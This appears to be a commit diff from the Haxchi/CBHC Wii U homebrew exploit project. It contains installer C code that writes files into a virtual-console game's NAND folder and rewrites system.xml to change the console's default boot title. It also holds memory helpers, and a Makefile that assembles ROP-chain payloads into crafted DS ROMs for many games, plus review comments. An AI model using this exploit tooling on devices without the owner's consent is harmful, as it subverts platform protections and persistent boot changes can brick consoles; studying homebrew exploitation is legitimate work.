sprintf(sdHaxchiPath,"%s/cbhc",sdCardVolPath);
#else
sprintf(sdHaxchiPath,"%s/haxchi",sdCardVolPath);
#endif
char sdPath[256];
#ifndef CB
sprintf(sdPath,"%s/config.txt",sdHaxchiPath);
if(IOSUHAX_FSA_OpenFile(fsaFd, sdPath, "rb", &sdFd) >= 0)
{
//read in sd file
fileStat_s stats;
IOSUHAX_FSA_StatFile(fsaFd, sdFd, &stats);
size_t cfgSize = stats.size;
uint8_t *cfgBuf = MEMBucket_alloc(cfgSize,4);
fsa_read(fsaFd, sdFd, cfgBuf, cfgSize);
IOSUHAX_FSA_CloseFile(fsaFd, sdFd);
sdFd = -1;
//write to nand
sprintf(path,"%s/content/config.txt",SelectedGame->path);
if(IOSUHAX_FSA_OpenFile(fsaFd, path, "wb", &mlcFd) >= 0)
{
println(line++,"Writing config.txt...");
fsa_write(fsaFd, mlcFd, cfgBuf, cfgSize);
IOSUHAX_FSA_CloseFile(fsaFd, mlcFd);
mlcFd = -1;
//make it readable by game
IOSUHAX_FSA_ChangeMode(fsaFd, path, 0x644);
}
MEMBucket_free(cfgBuf);
}
#endif
sprintf(sdPath,"%s/title.txt",sdHaxchiPath);
if(IOSUHAX_FSA_OpenFile(fsaFd, sdPath, "rb", &sdFd) >= 0)
{
//read in sd file
fileStat_s stats;
IOSUHAX_FSA_StatFile(fsaFd, sdFd, &stats);
size_t titleSize = stats.size;
xmlChar *titleBuf = MEMBucket_alloc(titleSize+1,4);
memset(titleBuf, 0, titleSize+1);
fsa_read(fsaFd, sdFd, titleBuf, titleSize);
IOSUHAX_FSA_CloseFile(fsaFd, sdFd);
sdFd = -1;
sprintf(path,"%s/meta/meta.xml",SelectedGame->path);
if(IOSUHAX_FSA_OpenFile(fsaFd, path, "rb", &mlcFd) >= 0)
{
IOSUHAX_FSA_StatFile(fsaFd, mlcFd, &stats);
size_t metaSize = stats.size;
char *metaBuf = MEMBucket_alloc(metaSize,4);
fsa_read(fsaFd, mlcFd, metaBuf, metaSize);
IOSUHAX_FSA_CloseFile(fsaFd, mlcFd);
mlcFd = -1;
//parse doc
xmlDocPtr doc = xmlReadMemory(metaBuf, metaSize, "meta.xml", "utf-8", 0);
//change title
xmlNode *root_element = xmlDocGetRootElement(doc);
xmlNode *cur_node = NULL;
for (cur_node = root_element->children; cur_node; cur_node = cur_node->next) {
if (cur_node->type == XML_ELEMENT_NODE) {
if(memcmp(cur_node->name, "longname_", 9) == 0 || memcmp(cur_node->name, "shortname_", 10) == 0)
{
if(xmlNodeGetContent(cur_node) == NULL || !strlen((char*)xmlNodeGetContent(cur_node))) continue;
xmlNodeSetContent(cur_node, titleBuf);
}
}
}
//back to xml
xmlChar *newXml = NULL;
int newSize = 0;
xmlSaveNoEmptyTags = 1; //keeps original style
xmlDocDumpFormatMemoryEnc(doc, &newXml, &newSize, "utf-8", 0);
xmlFreeDoc(doc);
if(newXml != NULL && newSize > 0)
{
//libxml2 adds in extra \n at the end
if(newXml[newSize-1] == '\n' && metaBuf[metaSize-1] != '\n')
{
newXml[newSize-1] = '\0';
newSize--;
}
//write back to nand
if(IOSUHAX_FSA_OpenFile(fsaFd, path, "wb", &mlcFd) >= 0)
{
println(line++,"Changing game title...");
//UTF-8 BOM
char bom[3] = { 0xEF, 0xBB, 0xBF };
if(memcmp(newXml, bom, 3) != 0 && memcmp(metaBuf, bom, 3) == 0)
fsa_write(fsaFd, mlcFd, bom, 0x03);
fsa_write(fsaFd, mlcFd, newXml, newSize);
IOSUHAX_FSA_CloseFile(fsaFd, mlcFd);
mlcFd = -1;
}
free(newXml);
}
MEMBucket_free(metaBuf);
}
MEMBucket_free(titleBuf);
}
sprintf(sdPath,"%s/bootDrcTex.tga",sdHaxchiPath);
if(IOSUHAX_FSA_OpenFile(fsaFd, sdPath, "rb", &sdFd) >= 0)
{
//read in sd file
fileStat_s stats;
IOSUHAX_FSA_StatFile(fsaFd, sdFd, &stats);
size_t bootDrcTexSize = stats.size;
uint8_t *bootDrcTex = MEMBucket_alloc(bootDrcTexSize,4);
fsa_read(fsaFd, sdFd, bootDrcTex, bootDrcTexSize);
IOSUHAX_FSA_CloseFile(fsaFd, sdFd);
sdFd = -1;
//write to nand
sprintf(path,"%s/meta/bootDrcTex.tga",SelectedGame->path);
if(IOSUHAX_FSA_OpenFile(fsaFd, path, "wb", &mlcFd) >= 0)
{
println(line++,"Writing bootDrcTex.tga...");
fsa_write(fsaFd, mlcFd, bootDrcTex, bootDrcTexSize);
IOSUHAX_FSA_CloseFile(fsaFd, mlcFd);
mlcFd = -1;
}
MEMBucket_free(bootDrcTex);
}
sprintf(sdPath,"%s/bootTvTex.tga",sdHaxchiPath);
if(IOSUHAX_FSA_OpenFile(fsaFd, sdPath, "rb", &sdFd) >= 0)
{
//read in sd file
fileStat_s stats;
IOSUHAX_FSA_StatFile(fsaFd, sdFd, &stats);
size_t bootTvTexSize = stats.size;
uint8_t *bootTvTex = MEMBucket_alloc(bootTvTexSize,4);
fsa_read(fsaFd, sdFd, bootTvTex, bootTvTexSize);
IOSUHAX_FSA_CloseFile(fsaFd, sdFd);
sdFd = -1;
//write to nand
sprintf(path,"%s/meta/bootTvTex.tga",SelectedGame->path);
if(IOSUHAX_FSA_OpenFile(fsaFd, path, "wb", &mlcFd) >= 0)
{
println(line++,"Writing bootTvTex.tga...");
fsa_write(fsaFd, mlcFd, bootTvTex, bootTvTexSize);
IOSUHAX_FSA_CloseFile(fsaFd, mlcFd);
mlcFd = -1;
}
MEMBucket_free(bootTvTex);
}
sprintf(sdPath,"%s/iconTex.tga",sdHaxchiPath);
if(IOSUHAX_FSA_OpenFile(fsaFd, sdPath, "rb", &sdFd) >= 0)
{
//read in sd file
fileStat_s stats;
IOSUHAX_FSA_StatFile(fsaFd, sdFd, &stats);
size_t iconTexSize = stats.size;
uint8_t *iconTex = MEMBucket_alloc(iconTexSize,4);
fsa_read(fsaFd, sdFd, iconTex, iconTexSize);
IOSUHAX_FSA_CloseFile(fsaFd, sdFd);
sdFd = -1;
//write to nand
sprintf(path,"%s/meta/iconTex.tga",SelectedGame->path);
if(IOSUHAX_FSA_OpenFile(fsaFd, path, "wb", &mlcFd) >= 0)
{
println(line++,"Writing iconTex.tga...");
fsa_write(fsaFd, mlcFd, iconTex, iconTexSize);
IOSUHAX_FSA_CloseFile(fsaFd, mlcFd);
mlcFd = -1;
}
MEMBucket_free(iconTex);
}
sprintf(sdPath,"%s/bootSound.btsnd",sdHaxchiPath);
if(IOSUHAX_FSA_OpenFile(fsaFd, sdPath, "rb", &sdFd) >= 0)
{
//read in sd file
fileStat_s stats;
IOSUHAX_FSA_StatFile(fsaFd, sdFd, &stats);
size_t bootSoundSize = stats.size;
uint8_t *bootSound = MEMBucket_alloc(bootSoundSize,4);
fsa_read(fsaFd, sdFd, bootSound, bootSoundSize);
IOSUHAX_FSA_CloseFile(fsaFd, sdFd);
sdFd = -1;
//write to nand
sprintf(path,"%s/meta/bootSound.btsnd",SelectedGame->path);
if(IOSUHAX_FSA_OpenFile(fsaFd, path, "wb", &mlcFd) >= 0)
{
println(line++,"Writing bootSound.btsnd...");
fsa_write(fsaFd, mlcFd, bootSound, bootSoundSize);
IOSUHAX_FSA_CloseFile(fsaFd, mlcFd);
mlcFd = -1;
}
MEMBucket_free(bootSound);
}
#ifdef CB
if(IOSUHAX_FSA_OpenFile(fsaFd, systemXmlPath, "rb", &slcFd) >= 0)
{
//read in system xml file
fileStat_s stats;
IOSUHAX_FSA_StatFile(fsaFd, slcFd, &stats);
size_t sysXmlSize = stats.size;
char *sysXmlBuf = MEMBucket_alloc(sysXmlSize+1,4);
memset(sysXmlBuf, 0, sysXmlSize+1);
fsa_read(fsaFd, slcFd, sysXmlBuf, sysXmlSize);
IOSUHAX_FSA_CloseFile(fsaFd, slcFd);
slcFd = -1;
xmlDocPtr doc = xmlReadMemory(sysXmlBuf, sysXmlSize, "system.xml", "utf-8", 0);
//change default title id
int idFound = 0, idCorrect = 0;
xmlNode *root_element = xmlDocGetRootElement(doc);
xmlNode *cur_node = NULL;
for (cur_node = root_element->children; cur_node; cur_node = cur_node->next) {
if (cur_node->type == XML_ELEMENT_NODE) {
if(memcmp(cur_node->name, "default_title_id", 17) == 0)
{
if(xmlNodeGetContent(cur_node) == NULL || !strlen((char*)xmlNodeGetContent(cur_node))) continue;
if(memcmp(sysmenuId, (char*)xmlNodeGetContent(cur_node), 17) == 0) idCorrect++;
idFound++;
}
}
}
if(idFound != 1)
println(line++,"default_title_id missing!");
else if(idCorrect != 1)
println(line++,"default_title_id not set to System Menu!");
else
{
int xmlBackedUp = 0;
if(IOSUHAX_FSA_OpenFile(fsaFd, syshaxXmlPath, "rb", &slcFd) < 0)
{
//write syshax.xml
if(IOSUHAX_FSA_OpenFile(fsaFd, syshaxXmlPath, "wb", &slcFd) >= 0)
{
println(line++,"Writing syshax.xml...");
fsa_write(fsaFd, slcFd, sysXmlBuf, sysXmlSize);
xmlBackedUp = 1;
IOSUHAX_FSA_CloseFile(fsaFd, slcFd);
slcFd = -1;
}
}
else
{
println(line++,"syshax.xml already found, skipping...");
xmlBackedUp = 1;
IOSUHAX_FSA_CloseFile(fsaFd, slcFd);
slcFd = -1;
}
if(xmlBackedUp == 0)
println(line++,"Failed to back up system.xml!");
else
{
idFound = 0, idCorrect = 0;
root_element = xmlDocGetRootElement(doc);
cur_node = NULL;
for (cur_node = root_element->children; cur_node; cur_node = cur_node->next) {
if (cur_node->type == XML_ELEMENT_NODE) {
if(memcmp(cur_node->name, "default_title_id", 17) == 0)
{
if(xmlNodeGetContent(cur_node) == NULL || !strlen((char*)xmlNodeGetContent(cur_node))) continue;
if(memcmp(sysmenuId, (char*)xmlNodeGetContent(cur_node), 17) == 0)
{
xmlNodeSetContent(cur_node, (xmlChar*)new_title_id);
idCorrect++;
}
idFound++;
}
}
}
if(idFound != 1)
println(line++,"default_title_id missing!");
else if(idCorrect != 1)
println(line++,"default_title_id not set to System Menu!");
else
{
//back to xml
xmlChar *newXml = NULL;
int newSize = 0;
xmlSaveNoEmptyTags = 0; //yep, different from meta.xml style
xmlDocDumpFormatMemoryEnc(doc, &newXml, &newSize, "utf-8", 0);
xmlFreeDoc(doc);
if(newXml != NULL && newSize > 0)
{
//libxml2 adds in extra \n at the end
if(newXml[newSize-1] == '\n' && sysXmlBuf[sysXmlSize-1] != '\n')
{
newXml[newSize-1] = '\0';
newSize--;
}
//write back to nand
if(IOSUHAX_FSA_OpenFile(fsaFd, systemXmlPath2, "wb", &slcFd) >= 0)
{
println(line++,"Writing system.xml...");
//UTF-8 BOM
char bom[3] = { 0xEF, 0xBB, 0xBF };
if(memcmp(newXml, bom, 3) != 0 && memcmp(sysXmlBuf, bom, 3) == 0)
fsa_write(fsaFd, slcFd, bom, 0x03);
fsa_write(fsaFd, slcFd, newXml, newSize);
IOSUHAX_FSA_CloseFile(fsaFd, slcFd);
slcFd = -1;
}
free(newXml);
}
}
}
}
MEMBucket_free(sysXmlBuf);
}
println(line++,"Done installing CBHC!");
#else
println(line++,"Done installing Haxchi!");
#endif
WHBLogPrintf("Success");
WHBLogConsoleDraw();
prgEnd:
if(tList) //cant be in MEMBucket
free(tList);
//close trigger everything fsa related
if(fsaFd >= 0)
{
if(slcFd >= 0)
IOSUHAX_FSA_CloseFile(fsaFd, slcFd);
if(mlcFd >= 0)
IOSUHAX_FSA_CloseFile(fsaFd, mlcFd);
if(sdFd >= 0)
IOSUHAX_FSA_CloseFile(fsaFd, sdFd);
if(sdMounted)
IOSUHAX_FSA_Unmount(fsaFd, sdCardVolPath, 2);
if(IOSUHAX_FSA_FlushVolume(fsaFd, "/vol/storage_mlc01") == 0)
println(line++, "Flushed NAND Cache!");
IOSUHAX_FSA_Close(fsaFd);
}
IOSUHAX_Close();
sleep(5);
OSForceFullRelaunch();
ProcUIShutdown();
memoryRelease();
WHBLogConsoleFree();
SYSRelaunchTitle(0, NULL);
WHBProcShutdown();
return 0;
}


@ -0,0 +1,19 @@
//Main.h
#ifndef _MAIN_H_
#define _MAIN_H_
#include <stdint.h>
/* Main */
#ifdef __cplusplus
extern "C" {
#endif
//! C wrapper for our C++ functions
int Menu_Main(void);
#ifdef __cplusplus
}
#endif
#endif


@ -0,0 +1,185 @@
/****************************************************************************
* Copyright (C) 2015 Dimok
*
* This program is free software: you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation, either version 3 of the License, or
* (at your option) any later version.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with this program. If not, see <http://www.gnu.org/licenses/>.
****************************************************************************/
#include <malloc.h>
#include <string.h>
#include <coreinit/memheap.h>
#include <coreinit/memfrmheap.h>
#include <coreinit/memexpheap.h>
#include "memory.h"
#define MEMORY_ARENA_1 0
#define MEMORY_ARENA_2 1
#define MEMORY_ARENA_3 2
#define MEMORY_ARENA_4 3
#define MEMORY_ARENA_5 4
#define MEMORY_ARENA_6 5
#define MEMORY_ARENA_7 6
#define MEMORY_ARENA_8 7
#define MEMORY_ARENA_FG_BUCKET 8
//!----------------------------------------------------------------------------------------------------------------------------------------------------------------------------
//! Memory functions
//! This is the only place where those are needed so lets keep them more or less private
//!----------------------------------------------------------------------------------------------------------------------------------------------------------------------------
static MEMHeapHandle mem1_heap = NULL;
static MEMHeapHandle bucket_heap = NULL;
void memoryInitialize(void) {
if(!mem1_heap) {
MEMHeapHandle mem1_heap_handle = MEMGetBaseHeapHandle(MEMORY_ARENA_1);
unsigned int mem1_allocatable_size = MEMGetAllocatableSizeForFrmHeapEx(mem1_heap_handle, 4);
void *mem1_memory = MEMAllocFromFrmHeapEx(mem1_heap_handle, mem1_allocatable_size, 4);
if(mem1_memory)
mem1_heap = MEMCreateExpHeapEx(mem1_memory, mem1_allocatable_size, 0);
}
if(!bucket_heap) {
MEMHeapHandle bucket_heap_handle = MEMGetBaseHeapHandle(MEMORY_ARENA_FG_BUCKET);
unsigned int bucket_allocatable_size = MEMGetAllocatableSizeForFrmHeapEx(bucket_heap_handle, 4);
void *bucket_memory = MEMAllocFromFrmHeapEx(bucket_heap_handle, bucket_allocatable_size, 4);
if(bucket_memory)
bucket_heap = MEMCreateExpHeapEx(bucket_memory, bucket_allocatable_size, 0);
}
}
void memoryRelease(void) {
if(mem1_heap) {
MEMDestroyExpHeap(mem1_heap);
MEMFreeToFrmHeap(MEMGetBaseHeapHandle(MEMORY_ARENA_1), 3);
mem1_heap = NULL;
}
if(bucket_heap) {
MEMDestroyExpHeap(bucket_heap);
MEMFreeToFrmHeap(MEMGetBaseHeapHandle(MEMORY_ARENA_FG_BUCKET), 3);
bucket_heap = NULL;
}
}
/*
//!-------------------------------------------------------------------------------------------
//! wraps
//!-------------------------------------------------------------------------------------------
void *__wrap_malloc(size_t size)
{
// pointer to a function resolve
return ((void * (*)(size_t))(*pMEMAllocFromDefaultHeap))(size);
}
void *__wrap_memalign(size_t align, size_t size)
{
if (align < 4)
align = 4;
// pointer to a function resolve
return ((void * (*)(size_t, size_t))(*pMEMAllocFromDefaultHeapEx))(size, align);
}
void __wrap_free(void *p)
{
// pointer to a function resolve
if(p != 0)
((void (*)(void *))(*pMEMFreeToDefaultHeap))(p);
}
void *__wrap_calloc(size_t n, size_t size)
{
void *p = __wrap_malloc(n * size);
if (p != 0) {
memset(p, 0, n * size);
}
return p;
}
size_t __wrap_malloc_usable_size(void *p)
{
//! TODO: this is totally wrong and needs to be addressed
return 0x7FFFFFFF;
}
void *__wrap_realloc(void *p, size_t size)
{
void *new_ptr = __wrap_malloc(size);
if (new_ptr != 0)
{
memcpy(new_ptr, p, __wrap_malloc_usable_size(p) < size ? __wrap_malloc_usable_size(p) : size);
__wrap_free(p);
}
return new_ptr;
}
//!-------------------------------------------------------------------------------------------
//! reent versions
//!-------------------------------------------------------------------------------------------
void *__wrap__malloc_r(struct _reent *r, size_t size)
{
return __wrap_malloc(size);
}
void *__wrap__calloc_r(struct _reent *r, size_t n, size_t size)
{
return __wrap_calloc(n, size);
}
void *__wrap__memalign_r(struct _reent *r, size_t align, size_t size)
{
return __wrap_memalign(align, size);
}
void __wrap__free_r(struct _reent *r, void *p)
{
__wrap_free(p);
}
size_t __wrap__malloc_usable_size_r(struct _reent *r, void *p)
{
return __wrap_malloc_usable_size(p);
}
void *__wrap__realloc_r(struct _reent *r, void *p, size_t size)
{
return __wrap_realloc(p, size);
}
*/
//!-------------------------------------------------------------------------------------------
//! some wrappers
//!-------------------------------------------------------------------------------------------
void * MEM2_alloc(unsigned int size, unsigned int align) {
return memalign(align, size);
}
void MEM2_free(void *ptr) {
free(ptr);
}
void * MEM1_alloc(unsigned int size, unsigned int align) {
if (align < 4)
align = 4;
return MEMAllocFromExpHeapEx(mem1_heap, size, align);
}
void MEM1_free(void *ptr) {
MEMFreeToExpHeap(mem1_heap, ptr);
}
void * MEMBucket_alloc(unsigned int size, unsigned int align) {
if (align < 4)
align = 4;
return MEMAllocFromExpHeapEx(bucket_heap, size, align);
}
void MEMBucket_free(void *ptr) {
MEMFreeToExpHeap(bucket_heap, ptr);
}
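Review bot: `MEM1_alloc` and `MEMBucket_alloc` hand `mem1_heap`/`bucket_heap` to `MEMAllocFromExpHeapEx` unguarded, yet both handles stay `NULL` when `memoryInitialize` could not carve the frame heap (a `NULL` from `MEMAllocFromFrmHeapEx` skips the `MEMCreateExpHeapEx` call in that branch) or when an allocator is reached before `memoryInitialize`, and the installer code shown earlier on this page passes the result of `MEMBucket_alloc` straight into `fsa_read` without a NULL check. A `if(!bucket_heap) return NULL;` guard at the top of each allocator (and `if(!ptr) return;` in the matching `*_free` wrappers) keeps that failure local, and a one-line note in memory.h that the allocators may return `NULL` would tell callers to check. The `MEMFreeToFrmHeap(..., 3)` calls in `memoryRelease` use a bare magic flag that deserves a comment naming what it selects. The roughly 70-line commented-out `__wrap_*` block between `memoryRelease` and the wrappers is dead code and should be deleted rather than kept as a comment.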


@ -0,0 +1,42 @@
/****************************************************************************
* Copyright (C) 2015 Dimok
*
* This program is free software: you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation, either version 3 of the License, or
* (at your option) any later version.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with this program. If not, see <http://www.gnu.org/licenses/>.
****************************************************************************/
#ifndef __MEMORY_H_
#define __MEMORY_H_
#ifdef __cplusplus
extern "C" {
#endif
#include <malloc.h>
void memoryInitialize(void);
void memoryRelease(void);
void * MEM2_alloc(unsigned int size, unsigned int align);
void MEM2_free(void *ptr);
void * MEM1_alloc(unsigned int size, unsigned int align);
void MEM1_free(void *ptr);
void * MEMBucket_alloc(unsigned int size, unsigned int align);
void MEMBucket_free(void *ptr);
#ifdef __cplusplus
}
#endif
#endif // __MEMORY_H_

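--- a/payload_generator/.gitignore
+++ b/payload_generator/.gitignore
@@ -0,0 +1,5 @@
+*.nds
+*.zip
+*.bin
+defines.s
+haxchi_installer/src/zipList.h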
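Review bot: The `haxchi_installer/src/zipList.h` pattern on the last line is resolved relative to `payload_generator/`, so it can never match anything from this file; the root `.gitignore` in this commit already carries that entry, and the line here should be dropped. If the intent was to ignore the zips this Makefile writes into `../haxchi_installer/data`, that is already covered by the root file's `haxchi_installer/data/` entry.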

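--- a/payload_generator/Makefile
+++ b/payload_generator/Makefile
@@ -0,0 +1,268 @@
+.PHONY := all code550.bin
+ifeq ($(Windows_NT), 1)
+ZIP = zip/zip.exe
+else
+ZIP = zip
+endif
+HAXCHI_S = haxchi.s
+ROP_S = haxchi_rop.s
+COREINIT_S = coreinit.s
+ROP_BIN = haxchi_rop.bin
+RELEASE = ../haxchi_installer
+TARGET_PATH = $(RELEASE)/data
+BUILD = build
+DEFINES = defines
+all: setup animalcrossing brainage dkjclimber guardiansigns kirby kirbymassattack mariokartds masterofdisguise newsmb_eur partnersintime \
+pokemonranger sfcommand sm64ds yoshids zeldaph zeldast \
+animalcrossing.zip brainage.zip dkjclimber.zip guardiansigns.zip kirby.zip kirbymassattack.zip mariokartds.zip masterofdisguise.zip \
+newsmb_eur.zip partnersintime.zip pokemonranger.zip sfcommand.zip sm64ds.zip yoshids.zip zeldaph.zip zeldast.zip
+animalcrossing: setup_animalcrossing animalcrossing.nds
+brainage: setup_brainage brainage.nds
+dkjclimber: setup_dkjclimber dkjclimber.nds
+guardiansigns: setup_guardiansigns guardiansigns.nds
+kirby: setup_kirby kirby.nds
+kirbymassattack: setup_kirbymassattack kirbymassattack.nds
+mariokartds: setup_mariokartds mariokartds.nds
+masterofdisguise: setup_masterofdisguise masterofdisguise.nds
+newsmb_eur: setup_newsmb_eur newsmb_eur.nds
+partnersintime: setup_partnersintime partnersintime.nds
+pokemonranger: setup_pokemonranger pokemonranger.nds
+sfcommand: setup_sfcommand sfcommand.nds
+sm64ds: setup_sm64ds sm64ds.nds
+yoshids: setup_yoshids yoshids.nds
+zeldaph: setup_zeldaph zeldaph.nds
+zeldast: setup_zeldast zeldast.nds
+setup:
+mkdir -p $(TARGET_PATH)
+mkdir -p $(BUILD)
+setup_animalcrossing:
+@rm -f defines.s $(ROP_BIN) haxchi_rop_hook.bin
+@cp -f $(DEFINES)/animalcrossing_defs.s defines.s
+setup_brainage:
+@rm -f defines.s $(ROP_BIN) haxchi_rop_hook.bin
+@cp -f $(DEFINES)/brainage_defs.s defines.s
+setup_dkjclimber:
+@rm -f defines.s $(ROP_BIN) haxchi_rop_hook.bin
+@cp -f $(DEFINES)/dkjclimber_defs.s defines.s
+setup_guardiansigns:
+@rm -f defines.s $(ROP_BIN) haxchi_rop_hook.bin
+@cp -f $(DEFINES)/guardiansigns_defs.s defines.s
+setup_kirby:
+@rm -f defines.s $(ROP_BIN) haxchi_rop_hook.bin
+@cp -f $(DEFINES)/kirby_defs.s defines.s
+setup_kirbymassattack:
+@rm -f defines.s $(ROP_BIN) haxchi_rop_hook.bin
+@cp -f $(DEFINES)/kirbymassattack_defs.s defines.s
+setup_mariokartds:
+@rm -f defines.s $(ROP_BIN) haxchi_rop_hook.bin
+@cp -f $(DEFINES)/mariokartds_defs.s defines.s
+setup_masterofdisguise:
+@rm -f defines.s $(ROP_BIN) haxchi_rop_hook.bin
+@cp -f $(DEFINES)/masterofdisguise_defs.s defines.s
+setup_newsmb_eur:
+@rm -f defines.s $(ROP_BIN) haxchi_rop_hook.bin
+@cp -f $(DEFINES)/newsmb_eur_defs.s defines.s
+setup_pokemonranger:
+@rm -f defines.s $(ROP_BIN) haxchi_rop_hook.bin
+@cp -f $(DEFINES)/pokemonranger_defs.s defines.s
+setup_partnersintime:
+@rm -f defines.s $(ROP_BIN) haxchi_rop_hook.bin
+@cp -f $(DEFINES)/partnersintime_defs.s defines.s
+setup_sfcommand:
+@rm -f defines.s $(ROP_BIN) haxchi_rop_hook.bin
+@cp -f $(DEFINES)/sfcommand_defs.s defines.s
+setup_sm64ds:
+@rm -f defines.s $(ROP_BIN) haxchi_rop_hook.bin
+@cp -f $(DEFINES)/sm64ds_defs.s defines.s
+setup_yoshids:
+@rm -f defines.s $(ROP_BIN) haxchi_rop_hook.bin
+@cp -f $(DEFINES)/yoshids_defs.s defines.s
+setup_zeldaph:
+@rm -f defines.s $(ROP_BIN) haxchi_rop_hook.bin
+@cp -f $(DEFINES)/zeldaph_defs.s defines.s
+setup_zeldast:
+@rm -f defines.s $(ROP_BIN) haxchi_rop_hook.bin
+@cp -f $(DEFINES)/zeldast_defs.s defines.s
+animalcrossing.nds:
+@armips $(ROP_S)
+@armips $(HAXCHI_S)
+@mv rom.nds $(BUILD)/animalcrossing.nds
+brainage.nds:
+@armips $(ROP_S)
+@armips $(HAXCHI_S)
+@mv rom.nds $(BUILD)/brainage.nds
+@cp $(BUILD)/brainage.nds $(BUILD)/yoshitouchandgo.nds
+dkjclimber.nds:
+@armips $(ROP_S)
+@armips $(HAXCHI_S)
+@mv rom.nds $(BUILD)/dkjclimber.nds
+guardiansigns.nds:
+@armips $(ROP_S)
+@armips $(HAXCHI_S)
+@mv rom.nds $(BUILD)/guardiansigns.nds
+kirby.nds:
+@armips $(ROP_S)
+@armips $(HAXCHI_S)
+@mv rom.nds $(BUILD)/kirby.nds
+kirbymassattack.nds:
+@armips $(ROP_S)
+@armips $(HAXCHI_S)
+@mv rom.nds $(BUILD)/kirbymassattack.nds
+mariokartds.nds:
+@armips $(ROP_S)
+@armips $(HAXCHI_S)
+@mv rom.nds $(BUILD)/mariokartds.nds
+@cp $(BUILD)/mariokartds.nds $(BUILD)/newsmb.nds
+masterofdisguise.nds:
+@armips $(ROP_S)
+@armips $(HAXCHI_S)
+@mv rom.nds $(BUILD)/masterofdisguise.nds
+newsmb_eur.nds:
+@armips $(ROP_S)
+@armips $(HAXCHI_S)
+@mv rom.nds $(BUILD)/newsmb_eur.nds
+pokemonranger.nds:
+@armips $(ROP_S)
+@armips $(HAXCHI_S)
+@mv rom.nds $(BUILD)/pokemonranger.nds
+partnersintime.nds:
+@armips $(ROP_S)
+@armips $(HAXCHI_S)
+@mv rom.nds $(BUILD)/partnersintime.nds
+sfcommand.nds:
+@armips $(ROP_S)
+@armips $(HAXCHI_S)
+@mv rom.nds $(BUILD)/sfcommand.nds
+sm64ds.nds:
+@armips $(ROP_S)
+@armips $(HAXCHI_S)
+@mv rom.nds $(BUILD)/sm64ds.nds
+@cp $(BUILD)/sm64ds.nds $(BUILD)/kirbycanvascurse.nds
+yoshids.nds:
+@armips $(ROP_S)
+@armips $(HAXCHI_S)
+@mv rom.nds $(BUILD)/yoshids.nds
+@cp $(BUILD)/yoshids.nds $(BUILD)/wwtouched.nds
+@cp $(BUILD)/yoshids.nds $(BUILD)/bigbrainacademy.nds
+zeldaph.nds:
+@armips $(ROP_S)
+@armips $(HAXCHI_S)
+@mv rom.nds $(BUILD)/zeldaph.nds
+zeldast.nds:
+@armips $(ROP_S)
+@armips $(HAXCHI_S)
+@mv rom.nds $(BUILD)/zeldast.nds
+@cp $(BUILD)/zeldast.nds $(BUILD)/explorersofsky.nds
+@cp $(BUILD)/zeldast.nds $(BUILD)/shadowsofalmia.nds
+animalcrossing.zip:
+$(ZIP) -JXjq9 $(TARGET_PATH)/animalcrossing.zip $(BUILD)/animalcrossing.nds
+brainage.zip:
+$(ZIP) -JXjq9 $(TARGET_PATH)/brainage.zip $(BUILD)/brainage.nds
+$(ZIP) -JXjq9 $(TARGET_PATH)/yoshitouchandgo.zip $(BUILD)/yoshitouchandgo.nds
+dkjclimber.zip:
+$(ZIP) -JXjq9 $(TARGET_PATH)/dkjclimber.zip $(BUILD)/dkjclimber.nds
+guardiansigns.zip:
+$(ZIP) -JXjq9 $(TARGET_PATH)/guardiansigns.zip $(BUILD)/guardiansigns.nds
+kirby.zip:
+$(ZIP) -JXjq9 $(TARGET_PATH)/kirby.zip $(BUILD)/kirby.nds
+kirbymassattack.zip:
+$(ZIP) -JXjq9 $(TARGET_PATH)/kirbymassattack.zip $(BUILD)/kirbymassattack.nds
+mariokartds.zip:
+$(ZIP) -JXjq9 $(TARGET_PATH)/mariokartds.zip $(BUILD)/mariokartds.nds
+$(ZIP) -JXjq9 $(TARGET_PATH)/newsmb.zip $(BUILD)/newsmb.nds
+masterofdisguise.zip:
+$(ZIP) -JXjq9 $(TARGET_PATH)/masterofdisguise.zip $(BUILD)/masterofdisguise.nds
+newsmb_eur.zip:
+$(ZIP) -JXjq9 $(TARGET_PATH)/newsmb_eur.zip $(BUILD)/newsmb_eur.nds
+pokemonranger.zip:
+$(ZIP) -JXjq9 $(TARGET_PATH)/pokemonranger.zip $(BUILD)/pokemonranger.nds
+partnersintime.zip:
+$(ZIP) -JXjq9 $(TARGET_PATH)/partnersintime.zip $(BUILD)/partnersintime.nds
+sfcommand.zip:
+$(ZIP) -JXjq9 $(TARGET_PATH)/sfcommand.zip $(BUILD)/sfcommand.nds
+sm64ds.zip:
+$(ZIP) -JXjq9 $(TARGET_PATH)/sm64ds.zip $(BUILD)/sm64ds.nds
+$(ZIP) -JXjq9 $(TARGET_PATH)/kirbycanvascurse.zip $(BUILD)/kirbycanvascurse.nds
+yoshids.zip:
+$(ZIP) -JXjq9 $(TARGET_PATH)/yoshids.zip $(BUILD)/yoshids.nds
+$(ZIP) -JXjq9 $(TARGET_PATH)/wwtouched.zip $(BUILD)/wwtouched.nds
+$(ZIP) -JXjq9 $(TARGET_PATH)/bigbrainacademy.zip $(BUILD)/bigbrainacademy.nds
+zeldaph.zip:
+$(ZIP) -JXjq9 $(TARGET_PATH)/zeldaph.zip $(BUILD)/zeldaph.nds
+zeldast.zip:
+$(ZIP) -JXjq9 $(TARGET_PATH)/zeldast.zip $(BUILD)/zeldast.nds
+$(ZIP) -JXjq9 $(TARGET_PATH)/explorersofsky.zip $(BUILD)/explorersofsky.nds
+$(ZIP) -JXjq9 $(TARGET_PATH)/shadowsofalmia.zip $(BUILD)/shadowsofalmia.nds
+clean:
+@rm -fr *.nds $(TARGET_PATH)/*.zip $(DATA) $(BUILD) defines.s
+@echo "all cleaned up !"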
